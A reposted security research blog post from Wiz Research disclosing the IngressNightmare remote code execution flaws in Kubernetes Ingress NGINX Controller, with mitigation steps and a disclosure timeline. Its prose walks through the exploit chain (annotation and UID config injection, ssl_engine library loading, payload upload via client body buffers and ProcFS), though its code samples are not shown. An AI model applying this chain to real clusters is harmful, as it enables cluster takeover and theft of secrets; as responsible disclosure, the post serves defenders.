Remote Code Execution Vulnerabilities in Ingress NGINX
Wiz Research发现了针对Kubernetes Ingress NGINX Controller的一系列未认证远程代码执行漏洞(CVE-2025-1097、CVE-2025-1098、CVE-2025-24514、CVE-2025-1974),统称为#IngressNightmare。这些漏洞允许攻击者未经授权访问集群中的所有秘密信息并可能导致集群被接管。约43%的云环境受影响,建议立即修补以缓解风险。 2025-3-25 03:2:55 Author: govuln.com(查看原文) 阅读量:27 收藏

Wiz Research discovered CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 and CVE-2025-1974, a series of unauthenticated Remote Code Execution vulnerabilities in Ingress NGINX Controller for Kubernetes dubbed #IngressNightmare. Exploitation of these vulnerabilities leads to unauthorized access to all secrets stored across all namespaces in the Kubernetes cluster by attackers, which can result in cluster takeover. 
 
This attack vector has been assigned a CVSS v3.1 base score of 9.8. 

In this blog post, we share key learnings from our discovery of IngressNightmare, affecting the admission controller component of Ingress NGINX Controller for Kubernetes. Based on our analysis, about 43% of cloud environments are vulnerable to these vulnerabilities, with our research uncovering over 6,500 clusters, including Fortune 500 companies, that publicly expose vulnerable Kubernetes ingress controllers’ admission controllers to the public internet—putting them at immediate critical risk. 

We recommend patching as soon as possible. This blog post details the technical elements of the vulnerability and contains mitigation and detection guidance for defenders.

We would like to thank the Ingress-NGINX maintainers, particularly Marco Ebert, for their help in addressing the IngressNightmare vulnerabilities. Our team worked closely with the Kubernetes maintainers and security teams to ensure this attack surface was fully eliminated before public disclosure. Kubernetes’s blog can be found here.

Ingress NGINX Controller is one of the most popular ingress controllers available for Kubernetes, and a core Kubernetes project, with over 18,000 stars on GitHub. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally. As an ingress controller, its job is to accept incoming traffic and route it to the relevant Kubernetes Services, which in turn forwards the traffic to the appropriate Pods, based on a set of rules. Specifically, Ingress NGINX Controller is based on the popular NGINX reverse proxy.  

 Figure: Ingress prerequisites from the Kubernetes documentation. 

Ingress-NGINX is explicitly highlighted in the Kubernetes documentation as an example Ingress controller that fulfills the prerequisite for using Ingress in Kubernetes. Our research show that over 41% of internet-facing clusters are running Ingress-NGINX. 

Ingress NGINX deploys an admission controller within its pod, designed to validate incoming ingress objects before they are deployed. By default, admission controllers are accessible over the network without authentication, making them a highly appealing attack vector. 

When the Ingress-NGINX admission controller processes an incoming ingress object, it constructs an NGINX configuration from it and then validates it using the NGINX binary.  Our team found a vulnerability in this phase that allows injecting an arbitrary NGINX configuration remotely, by sending a malicious ingress object directly to the admission controller through the network.  

During the configuration validation phase, the injected NGINX configuration causes the NGINX validator to execute code, allowing remote code execution (RCE) on the Ingress NGINX Controller’s pod. 

The admission controller’s elevated privileges and unrestricted network accessibility create a critical escalation path. Exploiting this flaw allows an attacker to execute arbitrary code and access all cluster secrets across namespaces, that could lead to complete cluster takeover. 

Figure: IngressNightmare attack vectors 

Mitigation & Detection 

First, determine if your clusters are using ingress-nginx. In most cases, you can check this by running kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx with cluster administrator permissions.

This vulnerability is fixed in Ingress NGINX Controller version 1.12.1 and 1.11.5. We strongly recommend that cluster admins: 

  • Update to the latest version of Ingress NGINX Controller. 

  • Ensure the admission webhook endpoint is not exposed externally

    • You can use this Nuclei template to check for exposed Ingress-NGINX admission controllers. 

If you can’t upgrade immediately, consider one of these mitigations: 

  • Enforce strict network policies so only the Kubernetes API Server can access the admission controller. 

  • Temporarily disable the admission controller component of Ingress-NGINX if you cannot upgrade right away.

    • If you have installed ingress-nginx using Helm, reinstall with controller.admissionWebhooks.enabled=false

    • If you have installed ingress-nginx manually, delete the ValidatingWebhookConfiguration called ingress-nginx-admission and remove the --validating-webhook argument from the ingress-nginx-controller container’s Deployment or DaemonSet. 

    • Remember to re-enable the Validating Admission Controller after you upgrade, because it provides important safeguards for your Ingress configurations. 

Wiz customers can use the pre-built query and advisory in the Wiz Threat Center. Wiz also validates for exposed admission controllers using the Wiz Dynamic Scanner. Finally, the Wiz Runtime Sensor detects zero-day vulnerabilities like IngressNightmare, by continuously monitoring ingress traffic, capturing malicious admission review requests in real-time, and flagging anomalous library loads to prevent similar attacks.

Research Motivation 

Kubernetes Admission Controllers present an interesting and often overlooked attack surface in a Kubernetes environment. They are triggered by the Kubernetes API server to review and potentially modify or block requests (AdmissionReview) before they are processed, and they often run with relatively high privileges within the cluster. Admission Controllers frequently don't require authentication and essentially function as web servers, introducing an additional internal network-accessible endpoint in the cluster. This architecture allows attackers to access them directly from any pod in the network, significantly increasing the attack surface. 

Background on Ingress NGINX Controller for Kubernetes 

Ingress NGINX Controller is an ingress implementation that uses NGINX as a reverse proxy and a load balancer. It is one of the most popular ingresses and is a core Kubernetes project. 

To bridge between Kubernetes and NGINX configurations, which is a non-Kubernetes-native technology, the controller attempts to translate Kubernetes Ingress objects into NGINX configurations. To ensure the stability of the NGINX server, the controller employs a validating admission webhook that validates the final configuration  before applying it.

Figure: Simplified diagram of Ingress NGINX Controller

From an attacker perspective, the admission controller is an unauthenticated HTTP endpoint responsible for complicated operations, and by default runs with a Kubernetes role that allows access to all of the environment’s secrets, making it an appealing research target.  

Remote NGINX Configuration Injection 

During our review of the Ingress NGINX Admission Controller code, we identified an interesting code path: when it processes incoming AdmissionReview requests, it generates a temporary NGINX configuration file based on a template file and the provided Ingress object. It then tests the validity of the temporary configuration file using the nginx -tcommand. We found multiple ways to inject new configuration directives in this code path. 

Typically, only the Kubernetes API server should send these AdmissionReview requests. However, because the Admission Controller lacks authentication, an attacker with minimal network access could craft and send arbitrary AdmissionReview requests from any pod within the cluster. 

For our testing, we used kube-review to create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP.

Figure: Example of an Admission Review object 

As can be seen above, there are plenty of fields we can control, showing the large attack surface. In this blog post we will look at two vulnerabilities in the annotation parsers that parse the .request.object.annotations field in the request above. Properties from this field are later included in the NGINX configuration file – which we used to inject arbitrary directives. 

CVE-2025-24514 – auth-url Annotation Injection 

The authreq parser is responsible for handling authentication-related annotations. The annotation requires an auth-url fields to be set, which includes a URL, and is finally propagated into the configuration file, in this code flow: 

When the temporary configuration is created, $externalAuth.URL—which corresponds to the URL from the auth-url annotation—is incorporated without proper sanitization.  

This lack of proper sanitization allows an attacker to inject arbitrary NGINX configuration directives, which get evaluated when nginx -t runs. 
 
Consider the following auth-url annotation: 

The final configuration will appear as follows:

This vulnerability does not apply to v1.12.0. In this version, Ingress NGINX Controller changed its default security settings to verify all annotations, including auth-url, against strict regex rules.   

CVE-2025-1097 – auth-tls-match-cn Annotation Injection 

The authtls parser, for its auth-tls-match-cn annotation, uses CommonNameAnnotationValidator to validate the field value: 

In other words, the auth-tls-match-cn annotation requires: 

  1. The value must start with CN=. 

  2. All remaining characters must form a valid regular expression. 

Similar to the previous injection, $server.CertificateAuth.MatchCN corresponds to the value of the auth-tls-match-cn annotation. While tricky, we can still bypass both requirements to inject arbitrary NGINX configurations in this part of the template:

Consider the following auth-tls-match-cn annotation:

The final configuration will appear as follows:

For the auth-tls-match-cn annotation value to appear in the configuration, we also need to provide the nginx.ingress.kubernetes.io/auth-tls-secret annotation, which corresponds to a TLS certificate or keypair secret present in the cluster. Since the service account used by Ingress NGINX has access to all secrets in the cluster, we can specify any secret name from any namespace, provided it matches the required TLS certificate/keypair format. Notably, many managed Kubernetes solutions include such secrets by default. Below is a short list of common secrets that can be leveraged in this type of attack: 

CVE-2025-1098 – mirror UID Injection 

In the mirror annotation parser, the following code processes the UID from the ingress object, and inserts it into $location.Mirror.Source in the temporary NGINX configuration. We control the ing.UID field, which allows for a new injection point.  

Since this injection is in the UID parameter, which is not a Kubernetes annotation, our input does not get sanitized by the annotations’ regex rules. Since our input gets inserted as-is, we can easily escape our context and inject arbitrary NGINX configuration directives. 

The vulnerabilities above allow an attacker to inject arbitrary directives to the NGINX configuration, which will later be tested by nginx -t. This does not immediately lead to code execution. If we can find a directive that executes arbitrary code in nginx -t, it will compromise the pod and obtain its highly privileged Kubernetes role. It is important to note that the NGINX configuration is only being tested, and is not being applied, reducing the number of directives we can actually (ab)use. 

Figure: Partial list of available NGINX directives (source

Initially we tried to use the load_module directive which can load a shared library from the filesystem. However, it can only be used in the beginning of the NGINX configuration, so when injected, load_module will fail with the following error message: 

Figure: `load_module` fails as it is specified too late in the configuration

There are many usable directives in Ingress NGINX Controller as their NGINX instance is compiled with many additional modules. We found that the ssl_engine directive, part of the OpenSSL module, can also load shared libraries. This behavior is undocumented. Unlike load_module, this directive can be used at any point within the configuration file, so it is suitable for our injection’s constraints. 

We can now load arbitrary library files during the NGINX configuration testing phase. Our next challenge is: How can we place a shared library on the pod’s filesystem? 

Uploading a shared library with NGINX Client Body Buffers 

In parallel to the nginx -t and the admission controller webhook, the pod also runs the NGINX instance itself, listening on port 80 or 443:  

Figure: NGINX is running in the same pod as Ingress NGINX Controller

When processing requests, NGINX sometimes saves the request body into a temporary file (client body buffering). This happens if the HTTP request body size is greater than a certain threshold, which is by default 8KB. This means that we should theoretically be able to send a large (>8KB) HTTP request, containing our payload in the form of a shared library as the body of the request, and NGINX will temporarily save it to a file on the pod’s filesystem. on the pod’s filesystem. 

Unfortunately, NGINX also removes the file immediately, creating a nearly-impossible race condition. However, NGINX holds an open file descriptor pointing to the file, which is accessible from ProcFS

Figure: File descriptor is still accessible from ProcFS, although the file itself is already deleted (FD #11)

To keep the file descriptor open, we can set the Content-Length header in the request to be larger than the actual content size. NGINX will keep waiting for more data to be sent, which will cause the process to hang, leaving the file-descriptor open for longer. 

The only downside to this trick is that we create the file in a different process, so we can’t use /proc/self to access it. Instead, we will have to guess both the PID and the FD number to find the shared library, but since this is a container with minimal processes, this can be done relatively fast with a few guesses. 

With a reliable file upload to Ingress NGINX Controller’s pod, we can now put it all together to exploit this issue into a full-blown Remote Code Execution. 

The exploit works as follows: 

  1. Upload our payload in the form of a shared library to the pod by abusing the client-body buffer feature of NGINX 

  2. Send an AdmissionReview request to the Ingress NGINX Controller’s admission controller, which contains any one of our directive injections 

  3. The directive we inject is the ssl_engine directive, which will cause NGINX to load the specified file as a shared library 

  4. We specify the ProcFS path to the file descriptor of our payload 

  5. If everything goes well, our shared library is now loaded, and we execute code remotely 

Here is a demo of the exploit in practice:

We are only scratching the surface in reviewing the security of admission controllers. Initially, we were surprised to see that such a large code base is used behind the scenes. In our view, this attack surface should be restricted in a much better way: removing access from pods within the cluster, and never exposing this publicly. We were also surprised by the lack of least-privilege design, as the exploit ended up with privileges to take control of the cluster. During this research, we found other vulnerabilities in Ingress NGINX Controller, and we expect to find more in other admission controllers. 

Finally, we learned that nginx -t should be considered harmful. We would be happy to hear about other cases where nginx -t processes unsanitized user input in the wild. This should be more clearly highlighted in the NGINX documentation. 

December 31, 2024 – Wiz Research reported CVE-2025-1974 and CVE-2025-24514 to Kubernetes. 

January 2, 2025 – Wiz Research reported CVE-2025-1097 to Kubernetes. 

January 3, 2025 – Kubernetes acknowledged the reports. 

January 9, 2025 – Kubernetes proposed a fix for CVE-2025-1097. 

January 10, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1097. 

January 12, 2025 – Kubernetes proposed a fix for CVE-2025-1974. 

January 16, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1974. 

January 20, 2025 – Kubernetes proposed a fix for CVE-2025-24513. 

January 21, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-24513. 

January 21, 2025 – Wiz Research reported CVE-2025-1098 to Kubernetes. 

February 7, 2025 – Kubernetes released internal patches for the injection vulnerabilities: CVE-2025-1098, CVE-2025-1097, and CVE-2025-24514. 

February 20, 2025 – Kubernetes notified Wiz Research that they removed the NGINX configuration validation from the admission controller, resolving CVE-2025-1974. 

March 10, 2025 – Kubernetes sent embargo notifications regarding the five vulnerabilities reported by Wiz Research. 

March 24, 2025 – Public disclosure.  

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Andres Riancho (@andresriancho) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: [email protected]


文章来源: https://govuln.com/news/url/7RWL
如有侵权请联系:admin#unsafe.sh